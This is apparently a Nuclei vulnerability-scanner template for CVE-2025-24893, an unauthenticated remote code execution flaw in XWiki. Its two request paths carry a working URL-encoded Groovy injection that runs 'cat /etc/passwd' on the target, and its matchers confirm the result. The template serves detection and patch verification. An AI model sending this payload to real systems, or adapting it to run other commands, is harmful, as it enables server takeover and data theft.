id: CVE-2025-24893

info:
  name: XWiki Platform - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    Any guest can perform arbitrary remote code execution through a request to SolrSearch.
    This impacts the confidentiality, integrity, and availability of the whole XWiki installation.
    This vulnerability has been patched in XWiki 15.10.11, 16.4.1, and 16.5.0RC1.
  impact: |
    An attacker can execute arbitrary code on the server, leading to a complete compromise of the XWiki instance.
  remediation: |
    Upgrade to XWiki 15.10.11, 16.4.1, or 16.5.0RC1 to mitigate this vulnerability.
  reference:
    - https://github.com/advisories/GHSA-rr6p-3pfg-562j
    - https://nvd.nist.gov/vuln/detail/CVE-2025-24893
  classification:
    epss-score: 0.93701
    epss-percentile: 0.99857
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-24893
    cwe-id: CWE-95
    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: xwiki
    product: xwiki
    shodan-query: html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: cve,cve2025,xwiki,rce,vkev,vuln,kev

http:
  - method: GET
    path:
      - "{{BaseURL}}/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20"
      - "{{BaseURL}}/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln(%22cat%20/etc/passwd%22.execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d%20"

    stop-at-first-match: true
    skip-variables-check: true

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0"
          - "wiki"
        condition: and

      - type: word
        part: content_type
        words:
          - "application/rss+xml"

      - type: status
        status:
          - 200
# digest: 490a00463044022062cc0e852ee5718564ca9bbe3670496c4a5087e20ef9c88885b66b28e2d68d4402205abb50e9e6b22084f43d74a8460bb6db4c5609b70a3d9c55687e85cda2e77a99:922c64590222798bb761d5b6d8e72950